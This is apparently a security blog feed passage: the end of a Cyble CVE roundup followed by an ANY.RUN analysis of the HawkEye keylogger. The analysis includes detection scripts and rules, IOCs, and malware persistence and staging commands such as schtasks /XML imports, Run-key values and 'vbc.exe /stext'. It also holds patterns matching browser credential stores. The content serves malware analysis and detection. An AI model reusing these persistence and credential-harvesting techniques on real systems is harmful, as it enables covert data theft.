While the vulnerability dates from February, CISA added it to its Known Exploited Vulnerabilities (KEV) catalog last month, and Cyble researchers have seen multiple exploits and proofs of concept (PoC) targeting the vulnerability discussed on the dark web and in cybercrime forums.

Cyble’s ODIN vulnerability search tool has detected 978,000 vulnerable Fortinet instances:

Vulnerable IT assets detected by Cyble

CVE-2024-50550: LiteSpeed Cache plugin for WordPress

Another vulnerability with wide exposure is CVE-2024-50550, a critical privilege escalation vulnerability in the LiteSpeed Cache plugin for WordPress, which is installed on over 6 million websites. Cyble honeypot sensors recently detected attacks on a different LiteSpeed vulnerability (CVE-2024-44000) and another WordPress plugin.

Cyble researchers said the new LiteSpeed vulnerability “could be leveraged to access backend databases as well to install arbitrary plugins or sniffers, leading attackers to exfiltrate payment card data and sensitive information of users,” as well as altering web pages.

CVE-2021-41285 and CVE-2020-14979: Windows Drivers

CVE-2021-41285 and CVE-2020-14979 are high-severity vulnerabilities in drivers that could allow attackers to achieve local privilege escalation to NT AUTHORITY\SYSTEM on Windows systems. A newly identified malware called “SteelFox” has been observed mining for cryptocurrency and stealing credit card data by using the “bring your own vulnerable driver” (BYOVD) technique to create a service that runs WinRing0.sys inside vulnerable drivers, leading to privilege escalation.

CVE-2024-38094: Microsoft SharePoint

CVE-2024-38094 is a high-severity remote code execution vulnerability affecting Microsoft SharePoint. Microsoft recently disclosed that the vulnerability is being exploited to gain initial access to corporate networks by attackers. Researchers also observed that attackers are targeting vulnerable SharePoint servers using publicly disclosed SharePoint proof-of-concept exploit code to plant a web shell that they later leverage to gain privileges and pivot into the compromised network.

CVE-2024-43047 and CVE-2024-43093: Android Kernel Components

CVE-2024-43047 is a high-severity use-after-free issue in closed-source Qualcomm components within the Android kernel that can lead to elevated privileges. CVE-2024-43093 is also a high-severity elevation of privilege flaw, impacting the Android Framework component and Google Play system updates, specifically in the Documents UI. Recently Google fixed both of the actively exploited zero-day flaws as part of its November security updates.

CVE-2024-8956 and CVE-2024-8957: PTZ Cameras

CVE-2024-8956 and CVE-2024-8957 impact PTZ cameras, which are extensively used in organizations around the world for applications such as live streaming, security surveillance, and conference automation. The critical vulnerabilities can also be chained by attackers to execute arbitrary OS commands on these devices, as well as access sensitive data such as usernames, password hashes, and device configuration details.

CVE-2024-10443: Synology NAS Devices

CVE-2024-10443 is a critical vulnerability in Synology’s BeeStation and DiskStation NAS devices, specifically within the BeePhotos and SynologyPhotos applications, which are designed to provide user-friendly personal cloud storage solutions. The vulnerability can allow remote attackers to execute arbitrary code. As NAS devices are commonly used to store sensitive data by both home and enterprise customers, Cyble researchers have assessed that attackers could attempt to leverage the vulnerability to breach the systems and steal data.

CVE-2024-50387: QNAP

CVE-2024-50387: This as-yet unclassified vulnerability, detailed in a QNAP advisory, was revealed at Pwn2Own 2024. It is a critical SQL injection (SQLi) vulnerability impacting QNAP’s SMB Service, which is the vendor’s implementation of the Server Message Block (SMB) protocol within QNAP NAS devices, enabling file sharing and network services across Windows and other operating systems.

Dark Web and Cybercrime Forum Exploits

Here are 7 vulnerabilities and exploits that Cyble researchers observed under active discussion on underground forums and Telegram channels, plus claims of zero-day vulnerabilities for sale in Palo Alto Networks and Microsoft products.

CVE-2024-6778: A high-severity vulnerability affecting the Chromium web browser prior to version 126.0.6478.182. The vulnerability arises from a race condition in the DevTools component. An attacker who convinces a user to install a malicious extension can inject arbitrary scripts or HTML into privileged pages, thereby facilitating a sandbox escape.

CVE-2024-46538: A critical cross-site scripting (XSS) vulnerability identified in pfSense version 2.5.2. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a ‘crafted payload’ into the $pconfig variable, specifically through the ‘interfaces_groups_edit.php’ file.

CVE-2024-44193: A vulnerability affecting Apple iTunes for Windows, specifically versions prior to 12.13.3. The vulnerability allows local attackers to potentially elevate their privileges on affected systems, posing significant security risks.

CVE-2024-39205: A critical vulnerability affecting pyload-ng, versions 0.5.0b3.dev85 running under Python 3.11 or below. This vulnerability allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise.

CVE-2024-40711: A critical vulnerability in Veeam Backup & Replication software classified as a deserialization of untrusted data issue. This vulnerability allows unauthenticated remote code execution (RCE), enabling attackers to execute arbitrary code on affected systems without requiring any authentication.

CVE-2024-0311: A cybersecurity vulnerability identified in the Skyhigh Client Proxy, this flaw allows a malicious insider to bypass existing security policies without needing a valid release code, which can potentially lead to unauthorized access to sensitive data or applications.

CVE-2024-20419: The critical vulnerability affecting Cisco’s Smart Software Manager On-Prem (SSM On-Prem) arises from improper validation in the password change functionality, allowing unauthenticated remote attackers to change user passwords without prior knowledge of the existing password.

Cyble researchers also observed zero-day vulnerabilities being offered for sale on dark web forums, including a remote code execution (RCE) vulnerability in Palo Alto’s PAN-OS, and a local privilege escalation (LPE) vulnerability in Windows for which a threat actor was asking US$200,000 to $400,000. Palo Alto issued an advisory stating that it is aware of the PAN-OS claim.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.

The post IT Vulnerability Report: Exposed Fortinet Vulnerabilities Approach 1 Million appeared first on Cyble.

Blog – Cyble – Read More

HawkEye Malware: Technical Analysis

Editor’s note: The current article is authored by the threat researcher Aaron Jornet Sales, also known as RexorVc0. You can find him on X and LinkedIn. 

HawkEye, also known as PredatorPain (Predator Pain), is a malware categorized as a keylogger, but over the years, it has adopted new functionalities that align it with the capabilities of other tools like stealers.

History of HawkEye

HawkEye emerged before 2010, with records of its use and sale dating back to 2008, making it quite long-lived. After several spearphishing campaigns in which this well-known malware was attached, it gained significant popularity starting in 2013.

This keylogger has been available on various dark web sites, even having dedicated websites where the tool was sold. However, this keylogger has been cracked for years and used by different actors without going through the subscription method imposed by its creators, whose price ranged between $20 and $50. This has contributed to its continued notoriety, and it has been used not only by criminal actors but also by script kiddies due to its ease of use.

Although it is not one of the most widely used malware families, it remains in active use and saw a significant resurgence during the COVID period. During this time, certain actors took advantage of the general hysteria to obtain company data through phishing campaigns.

Additionally, HawkEye has been used in conjunction with other loaders and/or malware that invoked this keylogger. Over its long trajectory, various actors and malware have been involved in attacks on companies, including Galleon Gold, Mikroceen, the iSPY crypter related to Gold Skyline, Remcos used in campaigns with HawkEye, Pony used in campaigns with HawkEye, etc.

Technical Analysis

The method of HawkEye’s delivery has varied throughout its history, as have the types of sources behind the attacks. Nevertheless, it has been primarily involved in spearphishing campaigns, where attackers devised convincing scenarios to trick victims into downloading the malicious file, which could be a document, compressed file, or another malware acting as a loader for the keylogger.

It has also been used to target websites of portals typically accessed by companies, which were the main targets of the attacking groups. Another common method of spreading HawkEye was through “free” software, which turned out to be malware in disguise.

HawkEye’s delivery methods are quite diverse compared to other malware. However, its execution and behavior have remained relatively consistent over the years. A behavior graph of what has been observed in recent months would look as follows:

HawkEye graph

During the analysis process, I typically spend weeks, even months, collecting samples to understand how they function as a whole based on the existing variants. Therefore, we may observe variations among those presented. In most executions, we encounter enormous trees of processes based on their activities.

To simplify, as you’ve seen in the previous graph, it’s not as complex as other stealers or RATs. It generally consists of an executable that drops others in temporary paths, then injects code into one of them or into a .NET-related program. Later, in memory, it gathers all possible data and sends it to a C&C.

ProcDOT detonation chart

Going straight to the point, in an initial execution of one of the samples I analyzed, we see a rather extensive process—a succession of execution copies launched in temporary paths.

Process Tree execution (Image 1)
Process Tree execution (Image 2)

In this instance, they used the Roaming\Templates path, but this is highly variable depending on who created it. Generally speaking, they tend to abuse paths like AppData\Roaming and AppData\Temp, which are classic choices.

Paths commonly abused (Image 1)
Paths commonly abused (Image 2)
Paths commonly abused (Image 3)

Here’s the list of paths observed for dropping files:

  • C:\Users\<user>\AppData\Local\Temp
  • C:\Users\<user>\AppData\Roaming
  • C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Templates
  • C:\Users\<user>\AppData\Local\Temp\System
  • C:\Users\<user>\Music

All of these files that are launched, and which we’ve observed executing in the previous step, are copies of themselves. The filenames are also highly variable, as you might expect, but they often try to have an icon that makes the victim think it’s a legitimate program, or the malware description might be altered to make it seem like legitimate software.

Ultimately, after comparing the dropped files, we can see they are simple copies of the original, with the particularity that some versions launch them in hidden mode, so you can’t see them unless you’ve enabled the “View hidden files” function in Windows.

Hidden files duplication graph

During these file droppings, we can encounter both replicas of the original file in different paths, as well as support files whose functionality is typically to establish persistence (or check if it’s already done, and if not, do it) and to perform injector functions, which is a characteristic of this malware. In this case, the smaller binary is responsible for these actions.

Injector written in temporary folder

I check to see if there is any shared information between the two binaries and notice that certain parts of the code match the original. This will become relevant later, as right now we’re seeing them separately, but everything will make sense afterward.

Comparison of the injector and the Hawkeye bin

After this step, we can see how persistence is established. PredatorPain isn’t just a malware that establishes persistence once—it’s been observed to check and establish persistence up to three different times, depending on the phases (Loader > Injector > Payload).

This makes it clear that the malware is determined to persist on the system, one way or another. At this stage, to avoid revealing persistence mechanisms through strings, it obfuscates a string and then decodes it to introduce, in this case, one of the binaries launched earlier. This practice isn’t as common and adds a level of sophistication not found in other samples.

Hawkeye persistence in the registry

Not only does it create persistence in the registry, but we also find samples that establish persistence in tasks using commands like the following:

schtasks.exe /Create /TN "<Path>\<TaskName>" /XML "<File>"
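The task definition that command imports can be triaged offline. The following is an added example (not code from the analysis): it parses an exported task XML and flags Exec actions whose command or arguments point into the drop paths listed above, with a Hidden task flag noted as an aggravating factor. Both task definitions in it are constructed, and the check is a heuristic, not a signature for this specific sample.

```python
"""Triage exported Windows Scheduled Task XML for HawkEye-style persistence.

Added example, not code from the original analysis. It reads the XML that
schtasks.exe /Create ... /XML <File> imports and flags Exec actions whose
command (or arguments) point into the drop paths listed in the analysis.
The two task definitions below are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Task Scheduler XML namespace used by every exported task definition.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Drop locations from the analysis; "<user>" stands for any profile name.
DROP_PATHS = [
    r"c:\users\<user>\appdata\local\temp",
    r"c:\users\<user>\appdata\roaming",
    r"c:\users\<user>\appdata\roaming\microsoft\windows\templates",
    r"c:\users\<user>\appdata\local\temp\system",
    r"c:\users\<user>\music",
]

# Environment variables an attacker may use instead of a literal profile path.
_ENV = {
    "%userprofile%": r"c:\users\<user>",
    "%appdata%": r"c:\users\<user>\appdata\roaming",
    "%localappdata%": r"c:\users\<user>\appdata\local",
    "%temp%": r"c:\users\<user>\appdata\local\temp",
    "%tmp%": r"c:\users\<user>\appdata\local\temp",
}


def _path_pattern(template: str):
    # Escape the template, let "<user>" match one directory name, and require a
    # path separator after the directory so only files *inside* it match.
    escaped = re.escape(template).replace(re.escape("<user>"), r"[^\\]+")
    return re.compile(escaped + r"\\", re.IGNORECASE)


# Most specific (longest) drop path first so a nested path wins.
_PATTERNS = sorted(((p, _path_pattern(p)) for p in DROP_PATHS),
                   key=lambda item: len(item[0]), reverse=True)


def normalise(command: str) -> str:
    """Lower-case, unquote, fix slashes and expand profile-relative variables."""
    cmd = command.strip().strip('"').replace("/", "\\").lower()
    for var, expansion in _ENV.items():
        cmd = cmd.replace(var, expansion)
    return cmd


@dataclass
class Finding:
    task_name: str
    command: str
    reasons: list = field(default_factory=list)


def triage_task_xml(xml_text: str, task_name: str = "<unnamed>") -> list:
    """Return one Finding per Exec action that runs from a known drop path."""
    root = ET.fromstring(xml_text)
    hidden_text = root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS)
    hidden = (hidden_text or "").strip().lower() == "true"
    findings = []
    for exec_node in root.findall("t:Actions/t:Exec", NS):
        command = exec_node.findtext("t:Command", default="", namespaces=NS) or ""
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS) or ""
        reasons = []
        for template, pattern in _PATTERNS:
            if pattern.match(normalise(command)):
                reasons.append(f"command runs from drop path {template}")
                break
        for template, pattern in _PATTERNS:
            if pattern.search(normalise(args)):
                reasons.append(f"arguments reference drop path {template}")
                break
        # Hidden tasks are common for legitimate software too, so the flag only
        # strengthens a finding rather than creating one on its own.
        if reasons and hidden:
            reasons.append("task marked Hidden")
        if reasons:
            findings.append(Finding(task_name, command, reasons))
    return findings


# Constructed task resembling what the analysis describes: a copy of the
# binary in the Roaming\Templates path, launched at logon and hidden.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2"
      xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>"%APPDATA%\Microsoft\Windows\Templates\WindowsUpdate.exe"</Command></Exec>
  </Actions>
</Task>"""

# Constructed benign task: vendor binary under Program Files, not hidden.
BENIGN_TASK_XML = r"""<Task version="1.2"
      xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\ExampleVendor\updater.exe</Command><Arguments>/check</Arguments></Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for name, xml_text in (("WindowsUpdate", SUSPICIOUS_TASK_XML), ("VendorUpdater", BENIGN_TASK_XML)):
        for finding in triage_task_xml(xml_text, name):
            print(f"[!] {finding.task_name}: {finding.command} -> {'; '.join(finding.reasons)}")
```

Real exports are UTF-16 files with a matching XML declaration, so load them with ET.parse on the file (or pass the decoded text with the declaration removed) rather than feeding the raw text to fromstring.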

After observing its behavior in the early stages, we delve deeper into the entire execution thread throughout the analysis phase with debugging. I’ve followed several samples, and they’re mostly similar—samples in .NET, sometimes obfuscated with tools like Confuser, Eaz, Reactor, or similar, which are relatively easy to deobfuscate.

Hawkeye code obfuscated

In most samples, I noticed heavy interaction with resources, which will become crucial shortly since I observed a significant amount of data in these resources across most of the samples I found.

Resources data content (Image 1)
Resources data content (Image 2)

In the malware’s initial phases, it looks for the running process (which will be the previously prepared copy), where it will check the PID to access the resources. Within these resources, we see two distinct types of code: the initial part, which acts as a key, and the data chunk, which is what will be deobfuscated. To achieve this, it uses XOR + Poly, and at the end of the process, it extracts a Portable Executable.

Graph of binary load from resources

It can do this in various ways depending on the sample, but we see the same extraction of a binary from a resource as we do from obfuscated code in memory, like the example shown below.

Graph of PE extraction from memory

The result of this phase is two extracted files—one will be the injector, and the other will be the Keylogger.

Extracted Injector
Extracted Keylogger

I compared both files, and they’re entirely different, in size, in structure—the only common factor is that both are .NET binaries.

Binary comparison

To highlight the difference between the injector dropped on disk (Right) and the one extracted from memory (Left), we can compare the extended content. We can observe how the memory-extracted injector includes imports related to injection that the disk version doesn’t (such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, etc.).

Extracted and dropped injector comparison
Extracted and dropped injector comparison
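The disk-versus-memory comparison above is something you will want to repeat on every dumped .NET injector, so here is an added triage helper (my own code, not the blog's or the malware's). P/Invoke target names live in the .NET metadata string heap as ASCII, and may also appear as UTF-16LE user strings, so it scans for both encodings. The three names the text mentions are taken from the page; the remaining thread-context and resume APIs are the usual companions of process hollowing and are my assumption, not something the page lists.

```python
# API names typical of process-hollowing injectors. The first four come from the
# comparison above; the thread-context/resume names are an added assumption.
HOLLOWING_APIS = (
    "ZwUnmapViewOfSection", "NtUnmapViewOfSection",
    "VirtualAllocEx", "WriteProcessMemory",
    "GetThreadContext", "SetThreadContext", "ResumeThread",
)

def find_api_names(buf: bytes) -> set:
    """Names present as ASCII (metadata #Strings heap) or UTF-16LE
    (user strings) substrings of the buffer."""
    found = set()
    for name in HOLLOWING_APIS:
        if name.encode("ascii") in buf or name.encode("utf-16-le") in buf:
            found.add(name)
    return found

def hollowing_capable(names: set) -> bool:
    """An unmap primitive plus remote allocate/write is the minimum treated as
    hollowing capability; a lone WriteProcessMemory is not enough."""
    has_unmap = bool(names & {"ZwUnmapViewOfSection", "NtUnmapViewOfSection"})
    return has_unmap and {"VirtualAllocEx", "WriteProcessMemory"} <= names

def memory_only_apis(disk_image: bytes, memory_dump: bytes) -> set:
    """Names the memory-extracted binary references that the disk copy lacks."""
    return find_api_names(memory_dump) - find_api_names(disk_image)

# Constructed stand-ins for the two binaries (not real samples): the disk copy
# only references registry persistence; the dump adds the injection imports.
DISK_IMAGE = (b"Microsoft.Win32.Registry\x00CurrentVersion\\Run\x00"
              b"System.Diagnostics.Process\x00Start\x00")
MEMORY_DUMP = (DISK_IMAGE
               + b"kernel32.dll\x00VirtualAllocEx\x00WriteProcessMemory\x00"
               + b"ntdll.dll\x00ZwUnmapViewOfSection\x00"
               + "ResumeThread".encode("utf-16-le"))

if __name__ == "__main__":
    print("memory-only:", sorted(memory_only_apis(DISK_IMAGE, MEMORY_DUMP)))
    print("hollowing capable:", hollowing_capable(find_api_names(MEMORY_DUMP)))
```

Substring matching is deliberately loose: it will also fire on a legitimate P/Invoke wrapper library, so treat the verdict as a triage signal that tells you which dump to open first, not as a classification on its own.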

Here we can observe various functionalities while extracting the binaries, such as self-deletion. This is done to maintain evasion and avoid revealing its location, as it drops replicas of the original binary in various locations, as we saw earlier.

Self-deletion and self-copy of the original binary (Image 1)

Self-deletion and self-copy of the original binary (Image 2)
Self-deletion and self-copy of the original binary (Image 3)
Self-deletion and self-copy of the original binary (Image 4)

One of the dropped files, the smaller one, acts as the injector. When extracted from memory, it has more functionalities than the one seen on disk. This is because the injection tasks are carried out during runtime, but the written file is actually a portion of this, triggering the main binary located in the temporary path.

It checks persistence and restarts the entire process, including injection. The file written to disk is therefore only a portion of the injector and does not reveal all of its functionality. I’ll show you how it performs injection using Process Hollowing.

Graph of the process injection

In essence, the injector doesn’t have much more functionality. It includes a phase where it checks running processes, which is an interesting technique to detect analysis tools or to determine if the process is already running. If not, it launches the process, adds it to the registry (as seen earlier), and restarts the execution.

Process collection routine (Image 1)
Process collection routine (Image 2)
Process collection routine (Image 3)

Lastly, we only have the second extraction left to observe, which is HawkEye itself. I’ve encountered many versions of it, as the modules included will vary significantly based on what the creator configures in the builder of the Keylogger itself.

We’ll talk more about this later, but you can see all the functionalities that can be added during its creation, which will impact the modules incorporated into it.

Comparison between crack and extracted keylogger features (Image 1)
Comparison between crack and extracted keylogger features (Image 2)

At this point, I conducted tests with several builders to verify this theory, as I had extracted multiple samples to the final phase, and almost none of them resembled each other too much. I tested by removing or adding options, and even with the same sample, there were significant differences, so you can imagine how different it can be if it’s not exactly the same version of the keylogger and different elements were selected during its creation.

Comparison between crack and extracted keylogger

At this stage, we just need to examine the payload’s functionalities. Upon first glance, we can see strings that reveal its nature—this sample didn’t expect anyone to reach this point, as it has three well-defined phases that conceal its tracks, but here we can see many indicators of what it is.


Overview of the extracted HawkEye (Image 1)
Overview of the extracted HawkEye (Image 2)

During the execution of this specific module, we can observe it invoking vbc.exe as it injects the payload into this process, using the same techniques we’ve previously seen.

Execution of HawkEye’s final stage (Image 1)
Execution of HawkEye’s final stage (Image 2)
Execution of HawkEye’s final stage (Image 3)

Regarding the modules it brings, I compared three different samples, and they are quite similar in terms of what they can do. The general functionalities that typically match include:

  • Keylogging (Monitoring and stealing keyboard and clipboard data)
  • System information gathering (OS, HW, Network)
  • Credential theft (Mail, FTP, browsers, video games, etc.)
  • Wallet theft
  • Screenshot capture
  • Security software detection
  • Analysis tools detection (Dbg, traffic, etc.)
  • Persistence (usually via registry keys or Tasks)
  • Information exfiltration through various methods (FTP, HTTP, SMTP, etc.)

Graph of payload module diffing

Calling HawkEye a keylogger is really an oversimplification, as it performs more functions than many stealers I’ve seen. Once injected into vbc.exe or other processes, it carries out various actions mentioned above.

Graph of HawkEye functionality

Outro

As we discussed earlier, different groups have used this keylogger, as well as independent criminals or even script kiddies. In my research, I found different places where this keylogger was sold—there were up to 4-5 different sites, as it changed developers and domains over time, which is quite common.

HawkEye webpage

It has also been distributed through cracks, where it was sold or offered on forums to members, avoiding the usual membership fees or markets, offering it for very low payments compared to the standard price, which as we mentioned earlier, ranged from $20 to $50.

HawkEye product sales

It’s always important with these kinds of tools to locate the original software in different versions to understand how it works from both the victim’s and the attacker’s perspectives, so we can get a complete view of the malware.

Here, we can see that the builder provides a multitude of configuration options, allowing us to choose where to send the stolen information (email, FTP, etc.), what we want to collect (browser info, FTP credentials, mail, etc.), whether to check for certain tools, establish persistence, delete data, download from a domain (this could function as a downloader for other malware), change the payload data to make it appear like legitimate software (e.g., changing the icon, description, etc.). As you can see, it’s incredibly comprehensive. After compiling, we’ll have our complete Keylogger, Stealer, or Downloader (call it what you will, as it does everything) ready to use.

Graph of HawkEye builder

I don’t want to repeat myself too much, but when comparing the versions we’ve seen and extracted with the ones we created ourselves, they function exactly the same—same injections, persistence, data theft (or whatever was chosen in the builder). Therefore, in telemetry, we won’t find any surprises, as you can see below.

Graph of the built HawkEye’s execution

After analyzing all of this, I hope you are as impressed as I am by the sheer versatility and longevity HawkEye has displayed over the decades. It’s truly a tremendously powerful and easy-to-use tool that, unfortunately, we will continue to see in security incidents from actors of all types.

Finally, I would like to thank you for reading this analysis and for supporting me.


Detection Opportunities

[TA0005][T1036] Duplication of original files in temporary paths

  • (WriteFile) C:\Users\<user>\AppData\Local\Temp\*.exe
  • (WriteFile) C:\Users\<user>\AppData\Roaming\*.exe
  • (WriteFile) C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Templates\*.exe
  • (WriteFile) C:\Users\<user>\AppData\Local\Temp\System\*.exe
  • (WriteFile) C:\Users\<user>\Music\*.exe

[TA0003][T1053] Scheduled Task persistence

  • schtasks.exe /Create /TN "<Path>\<TaskName>" /XML "<TempPath>\<File>"

[TA0003][T1547.001] Registry Run Keys persistence

  • (Registry) HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • (ValueData) <Path Used on [TA0005][T1036] Duplication of original files in temporary paths>

[TA0005][T1055.012] Process injection on vbc or itself

  • From file in temporary folder > injection > vbc.exe 
  • From file in temporary folder > injection > Other unidentified file in same temporary path

[TA0009][T1074.001] Save stolen info on txt files

  • vbc.exe /stext "*\AppData\Local\Temp\holdermail.txt"

[TA0009][T1113] Saving screenshots of the victim’s screen

  • (WriteFile / Regex NameFile) screenshot\d{1}.jpeg

[TA0006][T1555] Queries to browser paths or third-party software to obtain user account information

  • (Registry/Path query) Web Data | Login Data | Accounts | Profiles | Cookies\index.dat | profiles.ini | *.oeaccount
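The detection opportunities above translate directly into telemetry rules. As an added example (my own code, not ANY.RUN's), the following turns each of them into a check over file-write, process-creation, registry-set and file-query events, and correlates the Run-key value data with the temporary-path drops exactly as the T1547.001 entry describes. The event schema and the sample events are constructed for the example; map the field names onto whatever your EDR or sandbox emits.

```python
import re

# Event schema is an assumption modelled on common EDR/sandbox telemetry.

# Drop locations from "Duplication of original files in temporary paths".
DROP_PATH = re.compile(
    r"^[A-Z]:\\Users\\[^\\]+\\("
    r"AppData\\Local\\Temp(\\System)?"
    r"|AppData\\Roaming(\\Microsoft\\Windows\\Templates)?"
    r"|Music)\\[^\\]+\.exe$",
    re.IGNORECASE)
# screenshot<digit>.jpeg written anywhere on disk.
SCREENSHOT = re.compile(r"\\screenshot\d\.jpeg$", re.IGNORECASE)
# Browser / mail-client credential stores queried by the stealer modules.
CRED_STORE = re.compile(
    r"(\\Web Data|\\Login Data|\\Accounts|\\Profiles|\\Cookies\\index\.dat"
    r"|\\profiles\.ini|\.oeaccount)$",
    re.IGNORECASE)

def detect(events):
    """Return (technique, event) pairs for every event that matches a rule."""
    hits = []
    dropped = set()  # paths already flagged as T1036 drops, for Run-key correlation
    for ev in events:
        kind = ev["type"]
        if kind == "WriteFile":
            path = ev["path"]
            if DROP_PATH.match(path):
                dropped.add(path.lower())
                hits.append(("T1036", ev))
            elif SCREENSHOT.search(path):
                hits.append(("T1113", ev))
        elif kind == "ProcessCreate":
            image, cmd = ev["image"].lower(), ev["cmdline"].lower()
            if image.endswith("\\schtasks.exe") and "/create" in cmd and "/xml" in cmd:
                hits.append(("T1053", ev))
            elif image.endswith("\\vbc.exe") and "/stext" in cmd:
                hits.append(("T1074.001", ev))
        elif kind == "RegistrySet":
            data = ev["data"].strip('"')
            if ev["key"].lower().endswith("\\currentversion\\run") and (
                    data.lower() in dropped or DROP_PATH.match(data)):
                hits.append(("T1547.001", ev))
        elif kind == "FileQuery":
            if CRED_STORE.search(ev["path"]):
                hits.append(("T1555", ev))
    return hits

def technique_counts(events):
    """Technique -> number of matching events, for a quick triage summary."""
    counts = {}
    for technique, _ in detect(events):
        counts[technique] = counts.get(technique, 0) + 1
    return counts

# Constructed telemetry (not from a real infection) exercising each rule,
# plus a benign document write that must not fire.
SAMPLE_EVENTS = [
    {"type": "WriteFile", "path": r"C:\Users\alice\AppData\Local\Temp\svchost.exe"},
    {"type": "WriteFile", "path": r"C:\Users\alice\Music\update.exe"},
    {"type": "WriteFile", "path": r"C:\Users\alice\Documents\report.docx"},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "Updater\svchost" /XML "C:\Users\alice\AppData\Local\Temp\task.xml"'},
    {"type": "RegistrySet", "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "svchost", "data": r"C:\Users\alice\AppData\Local\Temp\svchost.exe"},
    {"type": "ProcessCreate", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "cmdline": r'vbc.exe /stext "C:\Users\alice\AppData\Local\Temp\holdermail.txt"'},
    {"type": "WriteFile", "path": r"C:\Users\alice\AppData\Local\Temp\screenshot3.jpeg"},
    {"type": "FileQuery", "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "FileQuery", "path": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
]

if __name__ == "__main__":
    for technique, ev in detect(SAMPLE_EVENTS):
        print(technique, ev)
    print(technique_counts(SAMPLE_EVENTS))
```

The drop-path and Run-key rules are the noisy ones on their own (installers write executables to `%TEMP%` and register Run keys all the time); the correlation of a Run-key value pointing at a path that was itself just written under a user temporary or Music folder, followed by a `vbc.exe /stext` launch, is what makes the chain specific to this family's behaviour.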

TTPs

[TA0001][T1566.001] SpearPhishing

[TA0002][T1204] User Execution

[TA0003][T1053] Scheduled Task/Job

[TA0003][T1547.001] Registry Run Keys / Startup Folder

[TA0005][T1112] Modify Registry

[TA0005][T1564.001] Hidden Files and Directories

[TA0005][T1055] Process Injection

[TA0005][T1562] Impair Defenses

[TA0005][T1027] Obfuscated Files or Information

[TA0005][T1140] Deobfuscate/Decode Files or Information

[TA0005][T1036] Masquerading

[TA0005][T1497] Virtualization/Sandbox Evasion

[TA0006][T1552] Unsecured Credentials

[TA0006][T1555] Credentials from Password Stores

[TA0007][T1087] Account Discovery

[TA0007][T1518.001] Security Software Discovery

[TA0007][T1033] System Owner/User Discovery

[TA0007][T1012] Query Registry

[TA0007][T1016] System Network Configuration Discovery

[TA0007][T1518] Software Discovery

[TA0007][T1082] System Information Discovery

[TA0009][T1074.001] Local Data Staging

[TA0009][T1005] Data from Local System

[TA0009][T1560] Archive Collected Data

[TA0009][T1114] Email Collection

[TA0009][T1115] Clipboard Data

[TA0009][T1113] Screen Capture

[TA0011][T1105] Ingress Tool Transfer

[TA0011][T1071] Application Layer Protocol

[TA0011][T1571] Non-Standard Port

[TA0042][T1583.008] Malvertising

IOCs

60fabd1a2509b59831876d5e2aa71a6b

defc51f31f6c4fa89cc6a39a62d8a08f

dea59d578e0e64728780fb67dde7d96d

040058f70ffdee6398f7b64ae1ea46d3

e651dca5c850451cdba7f25cbb4134e7

de823ba5d67de8682e6d7b8b472dbbcb

25a2d98dfcf6a12ea6459882c56aa2e0

179b219afa2ac15b14affd399273148b

38a3cb547a0a19a61534792f572f08b0

addcd85e0126e63e46da09eb8ea97120

0a2f6501a36c1b13532139e3c1843109

06916c9505da82f63a73768c6f336192

ab264deb2563dc4df8b281b18e0861ba

66[.]147[.]236[.]46

204[.]141[.]42[.]56

129[.]204[.]194[.]84

The post HawkEye Malware: Technical Analysis appeared first on ANY.RUN’s Cybersecurity Blog.
